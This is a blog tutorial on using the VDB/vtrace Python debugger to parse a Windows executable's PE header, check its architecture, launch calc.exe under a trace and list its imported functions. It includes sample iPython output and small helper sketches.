VDB aims to be a unified debugging platform, letting you climb up a layer of abstraction for windows/osx/linux (and talking to @at1as, it looks like there's some preliminary ARM support!), and debug processes the same way. That's exactly what I was looking for.
On to the code (and enough of my ramblings).
# Standard modules
import platform
import sys
import re
# Setup variables
cur_arch = platform.architecture()[0]
vdb_path = "C:\\old_downloads\\vdb_20120806"
run_prog = "C:\\windows\\system32\\calc.exe"
#run_prog = "C:\\Program Files\\7-Zip\\7zFM.exe"
# If we define our vdb path, insert it into sys.path
if vdb_path: sys.path.insert(1,vdb_path)
# Import vtrace and PE
import vtrace
import PE
# Import the current archtype only.
# Only 64-bit python can debug 64 bit apps.
if cur_arch == "32bit":
    from envi.archs import i386 as arch
else:
    from envi.archs import amd64 as arch
def parsePE(exe = run_prog):
    """
    Checks our PE for its architecture, and exits if it doesn't
    match the architecture of the running Python.
    """
    # Parse our PE
    pe_parsed = PE.peFromFileName(exe)
    # Get our 'Machine' field -> Tells us the architecture it
    # was compiled for
    pe_arch = pe_parsed.IMAGE_NT_HEADERS.FileHeader.Machine
    # If our platform arch != our PE header arch, exit out.
    # PE.IMAGE_FILE_MACHINE_I386 == 0x0000014c [ 332 ] == 32 bit
    # PE.IMAGE_FILE_MACHINE_AMD64 == 0x00008664 [34404] == 64 bit
    if pe_arch == PE.IMAGE_FILE_MACHINE_I386 and cur_arch != "32bit":
        print "This won't work! Debugging 32-bit executable in 64-bit python"
        sys.exit(1)
    elif pe_arch == PE.IMAGE_FILE_MACHINE_AMD64 and cur_arch != "64bit":
        print "This won't work! Debugging 64-bit executable in 32-bit python"
        sys.exit(1)
    return pe_parsed
# Parse out our PE information
p = parsePE()
# Execute our trace and get our base address
trace = vtrace.getTrace()
trace.execute(run_prog)
# Load our library base addresses
libs = trace.getMeta("LibraryBases")
# Find our PE base address
base = libs[re.findall('^.*\\\\(\w+).exe',run_prog.lower())[0]]
# Set up our exports dictionary to hold all the children functions for each DLL
exports = {}
for ord_num, dll_name, func_name in p.getImports():
    exports.setdefault(dll_name,[]).append((hex(base+ord_num),func_name))
# Print everything out!
for dll in exports:
    print dll.lower()
    for export in exports[dll]:
        print "\t" + export[0] + " - " + export[1]
Looks daunting, right? That's how a lot of VDB code turns out, you're just doing complicated things with binary files and memory, so it can't really be avoided.
Looking at the first section:
# Standard modules
import platform
import sys
import re
# Setup variables
cur_arch = platform.architecture()[0]
vdb_path = "C:\\old_downloads\\vdb_20120806"
run_prog = "C:\\windows\\system32\\calc.exe"
#run_prog = "C:\\Program Files\\7-Zip\\7zFM.exe"
# If we define our vdb path, insert it into sys.path
if vdb_path: sys.path.insert(1,vdb_path)
# Import vtrace and PE
import vtrace
import PE
# Import the current archtype only.
# Only 64-bit python can debug 64 bit apps.
if cur_arch == "32bit":
    from envi.archs import i386 as arch
else:
    from envi.archs import amd64 as arch
Here we import some basic modules, set some option variables, and import the rest of the VDB stuff. Not much to say, the code is pretty self-explanatory (and commented).
Let's move onto the second chunk:
def parsePE(exe = run_prog):
    """
    Checks our PE for its architecture, and exits if it doesn't
    match the architecture of the running Python.
    """
    # Parse our PE
    pe_parsed = PE.peFromFileName(exe)
    # Get our 'Machine' field -> Tells us the architecture it
    # was compiled for
    pe_arch = pe_parsed.IMAGE_NT_HEADERS.FileHeader.Machine
    # If our platform arch != our PE header arch, exit out.
    # PE.IMAGE_FILE_MACHINE_I386 == 0x0000014c [ 332 ] == 32 bit
    # PE.IMAGE_FILE_MACHINE_AMD64 == 0x00008664 [34404] == 64 bit
    if pe_arch == PE.IMAGE_FILE_MACHINE_I386 and cur_arch != "32bit":
        print "This won't work! Debugging 32-bit executable in 64-bit python"
        sys.exit(1)
    elif pe_arch == PE.IMAGE_FILE_MACHINE_AMD64 and cur_arch != "64bit":
        print "This won't work! Debugging 64-bit executable in 32-bit python"
        sys.exit(1)
    return pe_parsed
The first thing we do is load our executable into a PE class, which parses out a whole bunch of good, juicy information for us.
Remember kids → iPython is always your friend when exploring new pieces of code.
> ipython -i vtrace_ex.py
-- SNIP --
In [1]: p.<TAB>
p.IMAGE_DOS_HEADER p.getMaxRva p.inmem p.readAtRva
p.IMAGE_NT_HEADERS p.getPdataEntries p.parseExports p.readPointerAtOffset
p.checkRva p.getRelocations p.parseImports p.readPointerAtRva
p.fd p.getResourceDef p.parseLoadConfig p.readResource
p.getDataDirectory p.getResources p.parseRelocations p.readRvaFormat
p.getDllName p.getSectionByName p.parseResources p.readStringAtRva
p.getExportName p.getSections p.parseSections p.readStructAtOffset
p.getExports p.getVS_VERSIONINFO p.pe32p p.readStructAtRva
p.getForwarders p.high_bit_mask p.psize p.rvaToOffset
p.getImports p.imports p.readAtOffset p.sections
There are a lot of interesting things here, but what we're focused on here is the IMAGE_NT_HEADERS, which has a few fields, namely Signature, FileHeader, and OptionalHeader. By calling p.IMAGE_NT_HEADERS.tree() we can get a good overview of the information stored there.
Signature section (should always be "PE\x00\x00")
In [3]: print p.IMAGE_NT_HEADERS.tree()<ENTER>
00000000 (248) IMAGE_NT_HEADERS: IMAGE_NT_HEADERS
00000000 (04) Signature: 50450000
FileHeader section
00000004 (20) FileHeader: IMAGE_FILE_HEADER
00000004 (02) Machine: 0x0000014c (332)
00000006 (02) NumberOfSections: 0x00000004 (4)
00000008 (04) TimeDateStamp: 0x4a5bc622 (1247528482)
0000000c (04) PointerToSymbolTable: 0x00000000 (0)
00000010 (04) NumberOfSymbols: 0x00000000 (0)
00000014 (02) SizeOfOptionalHeader: 0x000000e0 (224)
00000016 (02) Ccharacteristics: 0x00000102 (258)
OptionalHeader section
00000018 (224) OptionalHeader: IMAGE_OPTIONAL_HEADER
00000018 (02) Magic: 0b01
0000001a (01) MajorLinkerVersion: 0x00000009 (9)
0000001b (01) MinorLinkerVersion: 0x00000000 (0)
0000001c (04) SizeOfCode: 0x00052e00 (339456)
00000020 (04) SizeOfInitializedData: 0x0006a600 (435712)
00000024 (04) SizeOfUninitializedData: 0x00000000 (0)
00000028 (04) AddressOfEntryPoint: 0x00009768 (38760)
0000002c (04) BaseOfCode: 0x00001000 (4096)
00000030 (04) BaseOfData: 0x00052000 (335872)
00000034 (04) ImageBase: 0x01000000 (16777216)
00000038 (04) SectionAlignment: 0x00001000 (4096)
0000003c (04) FileAlignment: 0x00000200 (512)
00000040 (02) MajorOperatingSystemVersion: 0x00000006 (6)
00000042 (02) MinorOperatingSystemVersion: 0x00000001 (1)
00000044 (02) MajorImageVersion: 0x00000006 (6)
00000046 (02) MinorImageVersion: 0x00000001 (1)
00000048 (02) MajorSubsystemVersion: 0x00000006 (6)
0000004a (02) MinorSubsystemVersion: 0x00000001 (1)
0000004c (04) Win32VersionValue: 0x00000000 (0)
00000050 (04) SizeOfImage: 0x000c0000 (786432)
00000054 (04) SizeOfHeaders: 0x00000400 (1024)
00000058 (04) CheckSum: 0x000cd612 (841234)
0000005c (02) Subsystem: 0x00000002 (2)
0000005e (02) DllCharacteristics: 0x00008140 (33088)
00000060 (04) SizeOfStackReserve: 0x00040000 (262144)
00000064 (04) SizeOfStackCommit: 0x00002000 (8192)
00000068 (04) SizeOfHeapReserve: 0x00100000 (1048576)
0000006c (04) SizeOfHeapCommit: 0x00001000 (4096)
00000070 (04) LoaderFlags: 0x00000000 (0)
00000074 (04) NumberOfRvaAndSizes: 0x00000010 (16)
00000078 (128) DataDirectory: VArray
00000078 (08) 0: IMAGE_DATA_DIRECTORY
00000078 (04) VirtualAddress: 0x00000000 (0)
0000007c (04) Size: 0x00000000 (0)
--SNIP--
So the field we're interested in is the FileHeader → Machine field. This gives us the architecture our executable was compiled to run on and, as with pretty much anything in the wonderful world of Windows, it's in a binary format.
Thankfully visi has provided us with some handy reference attributes for the PE module. They're pretty self-explanatory, but just to re-iterate.
PE.IMAGE_FILE_MACHINE_I386 == 0x0000014c [ 332 ] == 32 bit
PE.IMAGE_FILE_MACHINE_AMD64 == 0x00008664 [34404] == 64 bit
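To take some of the mystery out of that binary format, here is a rough sketch of pulling the Machine field out by hand with nothing but the struct module. This is not how VDB's PE module does it internally; the function names are invented for the example, and fake_pe() only builds enough of a header to exercise the parser (it is not a loadable executable).

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x014c
IMAGE_FILE_MACHINE_AMD64 = 0x8664


def read_machine(data):
    """Return the FileHeader.Machine value from the raw bytes of a PE file."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # e_lfanew, at offset 0x3c of the DOS header, is the file offset of the PE header
    (pe_offset,) = struct.unpack_from("<L", data, 0x3c)
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # Machine is the 2-byte field right after the 4-byte signature
    (machine,) = struct.unpack_from("<H", data, pe_offset + 4)
    return machine


def fake_pe(machine):
    """Build a stub header: DOS header, PE signature, Machine field."""
    dos_header = b"MZ" + b"\x00" * 0x3a + struct.pack("<L", 0x40)
    return dos_header + b"PE\x00\x00" + struct.pack("<H", machine)


print(hex(read_machine(fake_pe(IMAGE_FILE_MACHINE_I386))))
```

The offsets line up with the tree() output above: Signature sits at offset 0 of IMAGE_NT_HEADERS and Machine at offset 4.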
Cool beans. Let's move onto the code that actually parses out our executable's IAT.
# Parse out our PE information
p = parsePE()
# Execute our trace and get our base address
trace = vtrace.getTrace()
trace.execute(run_prog)
# Load our library base addresses
libs = trace.getMeta("LibraryBases")
# Find our PE base address
base = libs[re.findall('^.*\\\\(\w+).exe',run_prog.lower())[0]]
# Set up our exports dictionary to hold all the children functions for each DLL
exports = {}
for ord_num, dll_name, func_name in p.getImports():
    exports.setdefault(dll_name,[]).append((hex(base+ord_num),func_name))
# Print everything out!
for dll in exports:
    print dll.lower()
    for export in exports[dll]:
        print "\t" + export[0] + " - " + export[1]
When using the vtrace module, you pretty much always follow this convention. You can set breakpoints, or parameters to set breakpoints for you, then you call trace.run(), which is equivalent to a continue in $(your debugger of choice).
The getMeta() function is something that basically allows you to query the state of affairs going on with your trace handler (as far as I understand it). In our case we call it with "LibraryBases", which gives us our library names and their offsets. We could have also called "LibraryPaths", which would've given us a similar data structure with the full path to our libraries, but I chose to write a terrible looking regular expression to just chomp out our executable name to find its base address.
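For what it's worth, the same name-chomping can probably be done without a regular expression. Here is a small sketch using the standard library's ntpath module, which understands Windows-style paths on any platform. The function name is made up, and it assumes (as the regex version does) that the lookup key is the lowercased file name without its extension.

```python
import ntpath


def exe_key(path):
    """Return the lowercased executable name without directory or extension."""
    return ntpath.splitext(ntpath.basename(path))[0].lower()


print(exe_key("C:\\windows\\system32\\calc.exe"))
print(exe_key("C:\\Program Files\\7-Zip\\7zFM.exe"))
```

Unlike the \w+ pattern, this also copes with names containing dashes or spaces, though whether those keys match what getMeta() returns is something I haven't verified.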
Now that we have our program's base address though, we basically just need to get a list of the imports from our PE module. Super simple. The exports dictionary is populated with the dll name as the key, and a value array of tuples in the form (calculated address, name) for each function it imports.
It may be simpler to see the data itself, but just know we calculate the offset relative to our executable's base address.
In [36]: exports<ENTER>
--SNIP--
'ntdll.dll': [('0xf7112cL', 'WinSqmAddToStreamEx'),
('0xf71130L', 'WinSqmIncrementDWORD'),
('0xf71134L', 'WinSqmAddToStream'),
('0xf71138L', 'NtQueryLicenseValue'),
('0xf7113cL', 'RtlInitUnicodeString')],
'ole32.dll': [('0xf710f4L', 'CoInitialize'),
('0xf710f8L', 'CoUninitialize'),
('0xf710fcL', 'CoCreateInstance')]}
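If the setdefault() trick is new to you, here it is in isolation on a few hand-written tuples. The sample data is invented to resemble the dump above: the base address of 0xf70000 is an assumption, and so is the reading of the first tuple element as an offset that gets added to that base.

```python
def group_imports(imports, base):
    """Group (offset, dll_name, func_name) tuples into {dll: [(address, name), ...]}."""
    grouped = {}
    for offset, dll_name, func_name in imports:
        # setdefault() creates the empty list the first time a DLL shows up
        grouped.setdefault(dll_name.lower(), []).append((hex(base + offset), func_name))
    return grouped


sample = [
    (0x10f4, "ole32.dll", "CoInitialize"),
    (0x10f8, "ole32.dll", "CoUninitialize"),
    (0x113c, "ntdll.dll", "RtlInitUnicodeString"),
]

for dll, functions in sorted(group_imports(sample, 0xf70000).items()):
    print(dll)
    for address, name in functions:
        print("\t" + address + " - " + name)
```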
So there you have it. Fairly straight-forward code to dump all the imports for your executable's IAT! I cranked this out in a single night while drinking beer and relaxing, so needless to say - this tool makes for some extremely fast prototyping of awesome debugger stuff!
Looking into the ridiculously extensive source code for VDB, I can only conclude that @invisig0th and @at1as are simply smart people, and are just swimming in 0-days.

There's no way to hold THAT many 0-days!
NOTE: VDB's main site isn't currently hosting VDB/vtrace, but you can find it here